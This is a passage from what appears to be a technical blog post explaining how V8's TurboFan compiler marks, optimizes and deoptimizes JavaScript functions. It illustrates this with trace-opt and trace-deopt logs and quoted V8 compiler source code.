class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">$ ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax  --trace-opt --trace-deopt </span><br><span class="line">[marking 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; <span class="keyword">for</span> optimized recompilation, reason: small <span class="keyword">function</span>, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]</span><br><span class="line">[compiling method 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; using TurboFan]</span><br><span class="line">[optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; - took 6.583, 2.385, 0.129 ms]</span><br><span class="line">[completed optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt;]</span><br><span class="line"><span class="comment"># 分割线---------------------------------------------------------------------</span></span><br><span class="line">[marking 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; <span class="keyword">for</span> optimized recompilation, reason: hot and stable, ICs with typeinfo: 7/13 (53%), generic ICs: 0/13 (0%)]</span><br><span class="line">[compiling method 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; using TurboFan OSR]</span><br><span class="line">[optimizing 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; - took 3.684, 7.337, 0.409 ms]</span><br><span class="line"><span class="comment"># 分割线---------------------------------------------------------------------</span></span><br><span class="line">[deoptimizing (DEOPT soft): begin 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; (opt <span class="comment">#1) @6, FP to SP delta: 104, caller 
sp: 0x7ffed15d2a08]</span></span><br><span class="line">            ;;; deoptimize at &lt;test.js:15:6&gt;, Insufficient <span class="built_in">type</span> feedback <span class="keyword">for</span> construct</span><br><span class="line">  ...</span><br><span class="line"> </span><br><span class="line">[deoptimizing (soft): end 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; @6 =&gt; node=154, pc=0x7f0d956522e0, <span class="built_in">caller</span> sp=0x7ffed15d2a08, took 0.496 ms]</span><br><span class="line">[deoptimizing (DEOPT eager): begin 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; (opt <span class="comment">#0) @1, FP to SP delta: 24, caller sp: 0x7ffed15d2990]</span></span><br><span class="line">            ;;; deoptimize at &lt;test.js:5:17&gt;, wrong map</span><br><span class="line">  ...</span><br><span class="line">  </span><br><span class="line">[deoptimizing (eager): end 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; @1 =&gt; node=0, pc=0x7f0d956522e0, <span class="built_in">caller</span> sp=0x7ffed15d2990, took 0.355 ms]</span><br><span class="line"><span class="comment"># 分割线---------------------------------------------------------------------</span></span><br><span class="line">[marking 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; <span class="keyword">for</span> optimized recompilation, reason: small <span class="keyword">function</span>, ICs with typeinfo: 7/7 (100%), generic ICs: 0/7 (0%)]</span><br><span class="line">[compiling method 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; using TurboFan]</span><br><span class="line">[optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt; - took 1.435, 2.427, 0.159 ms]</span><br><span class="line">[completed optimizing 0x3c72eab23a99 &lt;JSFunction move (sfi = 0x3c72eab235f9)&gt;]</span><br><span class="line">[compiling method 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; using TurboFan 
OSR]</span><br><span class="line">[optimizing 0x3c72eab238e9 &lt;JSFunction (sfi = 0x3c72eab234e9)&gt; - took 3.399, 6.299, 0.239 ms]</span><br></pre></td></tr></table></figure><ul><li>First, the <code>move</code> function is marked for optimized recompilation because it is a small function. It is then recompiled and optimized.</li><li>Next, a second function is marked, this time with the reason <code>hot and stable</code>. The log entry carries no function name and a different address: it is the anonymous top-level script code containing the loop rather than <code>move</code>, and it is compiled via OSR while the loop is still running. The background is that V8 first generates <a href="https://v8.dev/docs/ignition">ignition bytecode</a>. When a piece of code is executed many times, TurboFan generates optimized code for it.</li></ul><blockquote><p>Below is the V8 code that determines the optimization reason. If the JS function is eligible for optimization, the calling V8 function marks it as pending optimization.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">OptimizationReason <span class="title">RuntimeProfiler::ShouldOptimize</span><span class="params">(JSFunction* function,</span></span></span><br><span class="line"><span 
class="params"><span class="function">                                                   JavaScriptFrame* frame)</span> </span>&#123;</span><br><span class="line">  SharedFunctionInfo* shared = function-&gt;<span class="built_in">shared</span>();</span><br><span class="line">  <span class="type">int</span> ticks = function-&gt;<span class="built_in">feedback_vector</span>()-&gt;<span class="built_in">profiler_ticks</span>();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>() &gt; kMaxBytecodeSizeForOpt) &#123;</span><br><span class="line">    <span class="keyword">return</span> OptimizationReason::kDoNotOptimize;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="type">int</span> ticks_for_optimization =</span><br><span class="line">      kProfilerTicksBeforeOptimization +</span><br><span class="line">      (shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>() / kBytecodeSizeAllowancePerTick);</span><br><span class="line">  <span class="comment">// Enough profiler ticks have accumulated: report HotAndStable</span></span><br><span class="line">  <span class="keyword">if</span> (ticks &gt;= ticks_for_optimization) &#123;</span><br><span class="line">    <span class="keyword">return</span> OptimizationReason::kHotAndStable;</span><br><span class="line">  <span class="comment">// The function is small: report small function</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (!any_ic_changed_ &amp;&amp; shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>() &lt;</span><br><span class="line">                                     kMaxBytecodeSizeForEarlyOpt) &#123;</span><br><span class="line">    <span class="comment">// If no IC was patched since the last tick and 
this function is very</span></span><br><span class="line">    <span class="comment">// small, optimistically optimize it now.</span></span><br><span class="line">    <span class="keyword">return</span> OptimizationReason::kSmallFunction;</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (FLAG_trace_opt_verbose) &#123;</span><br><span class="line">    <span class="built_in">PrintF</span>(<span class="string">&quot;[not yet optimizing &quot;</span>);</span><br><span class="line">    function-&gt;<span class="built_in">PrintName</span>();</span><br><span class="line">    <span class="built_in">PrintF</span>(<span class="string">&quot;, not enough ticks: %d/%d and &quot;</span>, ticks,</span><br><span class="line">           kProfilerTicksBeforeOptimization);</span><br><span class="line">    <span class="keyword">if</span> (any_ic_changed_) &#123;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot;ICs changed]\n&quot;</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot; too large for small function optimization: %d/%d]\n&quot;</span>,</span><br><span class="line">             shared-&gt;<span class="built_in">GetBytecodeArray</span>()-&gt;<span class="built_in">length</span>(), kMaxBytecodeSizeForEarlyOpt);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> OptimizationReason::kDoNotOptimize;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>Next, however, <strong>deopt</strong> begins. The first (soft) deopt hits the OSR-compiled top-level code, with the reason <code>Insufficient type feedback for construct</code>. The offending code is the <code>new Wall()</code> in <code>move(new Wall())</code>, a construct site that had never executed when the code was optimized.</p><p>This happens because TurboFan's optimization is <strong>based on speculation</strong>, i.e. <code>speculative optimizations</code>. When we repeatedly execute <code>move(new 
Player())</code>, TurboFan guesses that the argument of move is always a <code>Player</code> object and optimizes move into code tailored to <code>Player</code> objects, so calls to move with a <code>Player</code> become very fast.</p><p>Such speculation needs feedback in order to adjust its guesses dynamically. That feedback is <a href="https://mrale.ph/blog/2015/01/11/whats-up-with-monomorphism.html">type feedback</a>: the Ignition instructions collect type feedback to support TurboFan's <code>speculative optimizations</code>.</p><blockquote><p>In the V8 source, each <code>JSFunction</code> has an associated <code>FeedbackVector</code>, which becomes active once the JS function has been compiled.</p></blockquote><p>So as soon as the argument passed in is no longer a <code>Player</code> but, as here, a <code>Wall</code>, the speculation no longer holds and the code is deoptimized immediately, i.e. <strong>the optimized machine code is discarded and execution falls back to the Ignition bytecode</strong>.</p><p>Note that <strong>deoptimization</strong> carries a heavy performance cost and should be avoided wherever possible.</p></li><li><p>The reason for the next <code>deopt</code> is <code>wrong map</code>. For now, a <strong>map</strong> can be thought of as a <strong>type</strong>. As with the previous deopt, the optimized <code>move</code> function was generated only for <code>Player</code> objects, so once a <code>Wall</code> object is passed in, its type no longer matches the one assumed by the function and deoptimization is the only option.</p></li><li><p>If the code keeps alternating between <code>Player</code> and <code>Wall</code> objects, TurboFan takes both into account and re-optimizes the code accordingly.</p></li></ul></li></ul><h2 id="四、turboFan的执行流程">4. TurboFan Execution Flow</h2><ul><li><p>TurboFan's code optimization can be reached through several execution paths. The most common one is shown below:<br><img src="/2021/01/v8-turboFan/createGraph-bt1.png" alt="img"></p></li><li><p>It starts in <code>Runtime_CompileOptimized_Concurrent</code>, which requests concurrent compilation and optimization of a particular JS function</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\runtime\runtime-compiler.cc 
46</span></span><br><span class="line"><span class="built_in">RUNTIME_FUNCTION</span>(Runtime_CompileOptimized_Concurrent) &#123;</span><br><span class="line">  <span class="function">HandleScope <span class="title">scope</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(<span class="number">1</span>, args.<span class="built_in">length</span>());</span><br><span class="line">  <span class="built_in">CONVERT_ARG_HANDLE_CHECKED</span>(JSFunction, function, <span class="number">0</span>);</span><br><span class="line">  <span class="function">StackLimitCheck <span class="title">check</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="keyword">if</span> (check.<span class="built_in">JsHasOverflowed</span>(kStackSpaceRequiredForCompilation * KB)) &#123;</span><br><span class="line">    <span class="keyword">return</span> isolate-&gt;<span class="built_in">StackOverflow</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// Select concurrent mode, then start compiling and optimizing</span></span><br><span class="line">  <span class="keyword">if</span> (!Compiler::<span class="built_in">CompileOptimized</span>(function, ConcurrencyMode::kConcurrent)) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">ReadOnlyRoots</span>(isolate).<span class="built_in">exception</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">  <span class="keyword">return</span> function-&gt;<span class="built_in">code</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>Compiler::CompileOptimized</code> then calls <code>GetOptimizedCode</code> and installs the optimized code, if any was produced, on the <code>JSFunction</code> object.</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\compiler.cc</span></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">Compiler::CompileOptimized</span><span class="params">(Handle&lt;JSFunction&gt; function,</span></span></span><br><span class="line"><span class="params"><span class="function">                                ConcurrencyMode mode)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (function-&gt;<span class="built_in">IsOptimized</span>()) <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">  Isolate* isolate = function-&gt;<span class="built_in">GetIsolate</span>();</span><br><span class="line">  <span class="built_in">DCHECK</span>(AllowCompilation::<span class="built_in">IsAllowed</span>(isolate));</span><br><span 
class="line"></span><br><span class="line">  <span class="comment">// Start a compilation.</span></span><br><span class="line">  Handle&lt;Code&gt; code;</span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">GetOptimizedCode</span>(function, mode).<span class="built_in">ToHandle</span>(&amp;code)) &#123;</span><br><span class="line">    <span class="comment">// Optimization failed, get unoptimized code. Unoptimized code must exist</span></span><br><span class="line">    <span class="comment">// already if we are optimizing.</span></span><br><span class="line">    <span class="built_in">DCHECK</span>(!isolate-&gt;<span class="built_in">has_pending_exception</span>());</span><br><span class="line">    <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">    <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">IsInterpreted</span>());</span><br><span class="line">    code = <span class="built_in">BUILTIN_CODE</span>(isolate, InterpreterEntryTrampoline);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Install code on closure.</span></span><br><span class="line">  function-&gt;<span class="built_in">set_code</span>(*code);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Check postconditions on success.</span></span><br><span class="line">  <span class="built_in">DCHECK</span>(!isolate-&gt;<span class="built_in">has_pending_exception</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">is_compiled</span>());</span><br><span 
class="line">  <span class="built_in">DCHECK_IMPLIES</span>(function-&gt;<span class="built_in">HasOptimizationMarker</span>(),</span><br><span class="line">                 function-&gt;<span class="built_in">IsInOptimizationQueue</span>());</span><br><span class="line">  <span class="built_in">DCHECK_IMPLIES</span>(function-&gt;<span class="built_in">HasOptimizationMarker</span>(),</span><br><span class="line">                 function-&gt;<span class="built_in">ChecksOptimizationMarker</span>());</span><br><span class="line">  <span class="built_in">DCHECK_IMPLIES</span>(function-&gt;<span class="built_in">IsInOptimizationQueue</span>(),</span><br><span class="line">                 mode == ConcurrencyMode::kConcurrent);</span><br><span class="line">  <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The code of <code>GetOptimizedCode</code> is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span 
class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8\src\compiler.cc</span></span><br><span class="line"><span class="function">MaybeHandle&lt;Code&gt; <span class="title">GetOptimizedCode</span><span class="params">(Handle&lt;JSFunction&gt; function,</span></span></span><br><span class="line"><span class="params"><span class="function">                                   ConcurrencyMode mode,</span></span></span><br><span class="line"><span class="params"><span class="function">                                   BailoutId osr_offset = BailoutId::None(),</span></span></span><br><span class="line"><span class="params"><span class="function">                                   JavaScriptFrame* osr_frame = <span class="literal">nullptr</span>)</span> </span>&#123;</span><br><span class="line">  Isolate* isolate = function-&gt;<span class="built_in">GetIsolate</span>();</span><br><span class="line">  <span class="function">Handle&lt;SharedFunctionInfo&gt; <span class="title">shared</span><span class="params">(function-&gt;shared(), isolate)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Make sure we clear the optimization marker on the function so that we</span></span><br><span class="line">  <span class="comment">// don&#x27;t try to re-optimize.</span></span><br><span class="line">  <span class="keyword">if</span> 
(function-&gt;<span class="built_in">HasOptimizationMarker</span>()) &#123;</span><br><span class="line">    function-&gt;<span class="built_in">ClearOptimizationMarker</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (isolate-&gt;<span class="built_in">debug</span>()-&gt;<span class="built_in">needs_check_on_function_call</span>()) &#123;</span><br><span class="line">    <span class="comment">// Do not optimize when debugger needs to hook into every call.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  Handle&lt;Code&gt; cached_code;</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">GetCodeFromOptimizedCodeCache</span>(function, osr_offset)</span><br><span class="line">          .<span class="built_in">ToHandle</span>(&amp;cached_code)) &#123;</span><br><span class="line">    <span class="keyword">if</span> (FLAG_trace_opt) &#123;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot;[found optimized code for &quot;</span>);</span><br><span class="line">      function-&gt;<span class="built_in">ShortPrint</span>();</span><br><span class="line">      <span class="keyword">if</span> (!osr_offset.<span class="built_in">IsNone</span>()) &#123;</span><br><span class="line">        <span class="built_in">PrintF</span>(<span class="string">&quot; at OSR AST id %d&quot;</span>, osr_offset.<span class="built_in">ToInt</span>());</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="built_in">PrintF</span>(<span class="string">&quot;]\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> cached_code;</span><br><span 
class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Reset profiler ticks, function is no longer considered hot.</span></span><br><span class="line">  <span class="built_in">DCHECK</span>(shared-&gt;<span class="built_in">is_compiled</span>());</span><br><span class="line">  function-&gt;<span class="built_in">feedback_vector</span>()-&gt;<span class="built_in">set_profiler_ticks</span>(<span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">  <span class="function">VMState&lt;COMPILER&gt; <span class="title">state</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!isolate-&gt;<span class="built_in">has_pending_exception</span>());</span><br><span class="line">  <span class="function">PostponeInterruptsScope <span class="title">postpone</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="type">bool</span> has_script = shared-&gt;<span class="built_in">script</span>()-&gt;<span class="built_in">IsScript</span>();</span><br><span class="line">  <span class="comment">// BUG(5946): This DCHECK is necessary to make certain that we won&#x27;t</span></span><br><span class="line">  <span class="comment">// tolerate the lack of a script without bytecode.</span></span><br><span class="line">  <span class="built_in">DCHECK_IMPLIES</span>(!has_script, shared-&gt;<span class="built_in">HasBytecodeArray</span>());</span><br><span class="line">  <span class="function">std::unique_ptr&lt;OptimizedCompilationJob&gt; <span class="title">job</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">      compiler::Pipeline::NewCompilationJob(isolate, function, has_script))</span></span>;</span><br><span class="line">  OptimizedCompilationInfo* compilation_info = job-&gt;<span 
class="built_in">compilation_info</span>();</span><br><span class="line"></span><br><span class="line">  compilation_info-&gt;<span class="built_in">SetOptimizingForOsr</span>(osr_offset, osr_frame);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Do not use TurboFan if we need to be able to set break points.</span></span><br><span class="line">  <span class="keyword">if</span> (compilation_info-&gt;<span class="built_in">shared_info</span>()-&gt;<span class="built_in">HasBreakInfo</span>()) &#123;</span><br><span class="line">    compilation_info-&gt;<span class="built_in">AbortOptimization</span>(BailoutReason::kFunctionBeingDebugged);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Do not use TurboFan when %NeverOptimizeFunction was applied.</span></span><br><span class="line">  <span class="keyword">if</span> (shared-&gt;<span class="built_in">optimization_disabled</span>() &amp;&amp;</span><br><span class="line">      shared-&gt;<span class="built_in">disable_optimization_reason</span>() ==</span><br><span class="line">          BailoutReason::kOptimizationDisabledForTest) &#123;</span><br><span class="line">    compilation_info-&gt;<span class="built_in">AbortOptimization</span>(</span><br><span class="line">        BailoutReason::kOptimizationDisabledForTest);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Do not use TurboFan if optimization is disabled or function doesn&#x27;t pass</span></span><br><span class="line">  <span class="comment">// turbo_filter.</span></span><br><span class="line">  <span 
class="keyword">if</span> (!FLAG_opt || !shared-&gt;<span class="built_in">PassesFilter</span>(FLAG_turbo_filter)) &#123;</span><br><span class="line">    compilation_info-&gt;<span class="built_in">AbortOptimization</span>(BailoutReason::kOptimizationDisabled);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function">TimerEventScope&lt;TimerEventOptimizeCode&gt; <span class="title">optimize_code_timer</span><span class="params">(isolate)</span></span>;</span><br><span class="line">  <span class="function">RuntimeCallTimerScope <span class="title">runtimeTimer</span><span class="params">(isolate,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     RuntimeCallCounterId::kOptimizeCode)</span></span>;</span><br><span class="line">  <span class="built_in">TRACE_EVENT0</span>(<span class="built_in">TRACE_DISABLED_BY_DEFAULT</span>(<span class="string">&quot;v8.compile&quot;</span>), <span class="string">&quot;V8.OptimizeCode&quot;</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// In case of concurrent recompilation, all handles below this point will be</span></span><br><span class="line">  <span class="comment">// allocated in a deferred handle scope that is detached and handed off to</span></span><br><span class="line">  <span class="comment">// the background thread when we return.</span></span><br><span class="line">  base::Optional&lt;CompilationHandleScope&gt; compilation;</span><br><span class="line">  <span class="keyword">if</span> (mode == ConcurrencyMode::kConcurrent) &#123;</span><br><span class="line">    compilation.<span class="built_in">emplace</span>(isolate, compilation_info);</span><br><span class="line">  &#125;</span><br><span 
class="line"></span><br><span class="line">  <span class="comment">// All handles below will be canonicalized.</span></span><br><span class="line">  <span class="function">CanonicalHandleScope <span class="title">canonical</span><span class="params">(isolate)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Reopen handles in the new CompilationHandleScope.</span></span><br><span class="line">  compilation_info-&gt;<span class="built_in">ReopenHandlesInNewHandleScope</span>(isolate);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (mode == ConcurrencyMode::kConcurrent) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">GetOptimizedCodeLater</span>(job.<span class="built_in">get</span>(), isolate)) &#123;</span><br><span class="line">      job.<span class="built_in">release</span>();  <span class="comment">// The background recompile job owns this now.</span></span><br><span class="line"></span><br><span class="line">      <span class="comment">// Set the optimization marker and return a code object which checks it.</span></span><br><span class="line">      function-&gt;<span class="built_in">SetOptimizationMarker</span>(OptimizationMarker::kInOptimizationQueue);</span><br><span class="line">      <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">IsInterpreted</span>() ||</span><br><span class="line">             (!function-&gt;<span class="built_in">is_compiled</span>() &amp;&amp; function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">IsInterpreted</span>()));</span><br><span class="line">      <span class="built_in">DCHECK</span>(function-&gt;<span class="built_in">shared</span>()-&gt;<span class="built_in">HasBytecodeArray</span>());</span><br><span class="line">      <span class="keyword">return</span> <span class="built_in">BUILTIN_CODE</span>(isolate, 
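InterpreterEntryTrampoline);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">GetOptimizedCodeNow</span>(job.<span class="built_in">get</span>(), isolate))</span><br><span class="line">      <span class="keyword">return</span> compilation_info-&gt;<span class="built_in">code</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (isolate-&gt;<span class="built_in">has_pending_exception</span>()) isolate-&gt;<span class="built_in">clear_pending_exception</span>();</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">MaybeHandle</span>&lt;Code&gt;();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The function is fairly long, so here is a summary of what it does:</p><ul><li><p>If the function was previously marked for optimization, that marker is cleared (recall the output of <code>--trace-opt</code>).</p></li><li><p>If the debugger needs to hook into the function, or a breakpoint has been set on it, the function is not optimized and the call returns immediately.</p></li><li><p>If the function has already been optimized (an entry exists in the OptimizedCodeCache), the previously optimized code is returned directly.</p></li><li><p>The <code>profiler ticks</code> of the function are reset so that it is <strong>no longer hot</strong>, which keeps it from being optimized repeatedly.</p></li><li><p>If optimization has been disabled for the function (for example via <code>%NeverOptimizeFunction</code>, or because the function does not pass <code>turbo_filter</code>), the optimization is aborted.</p></li><li><p>Once all the checks above pass, optimization begins. There are two ways to optimize: <strong>concurrent optimization</strong> and <strong>non-concurrent optimization</strong>. In most cases the concurrent path is taken, because the main thread does not have to wait for the optimization to finish.</p><p>Concurrent optimization first calls <code>GetOptimizedCodeLater</code>, which checks for a few exceptional conditions, such as the job queue being full or memory usage being too high. If none of them applies, it calls <code>OptimizedCompilationJob::PrepareJob</code>, which further down the call chain invokes <code>PipelineImpl::CreateGraph</code> to <strong>build the graph</strong>.</p><p>If <code>GetOptimizedCodeLater</code> succeeds, the optimization <code>Job</code> is placed in the job queue, and the queue schedules another thread to carry out the optimization.</p><p>The call stack of that other thread is shown below. The thread runs <code>Job-&gt;ExecuteJob</code> and, further down the call chain, calls <code>PipelineImpl::OptimizeGraph</code> to <strong>optimize the graph built earlier</strong>:</p><p><img src="/2021/01/v8-turboFan/OptimizeGraph-bt1.png" 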
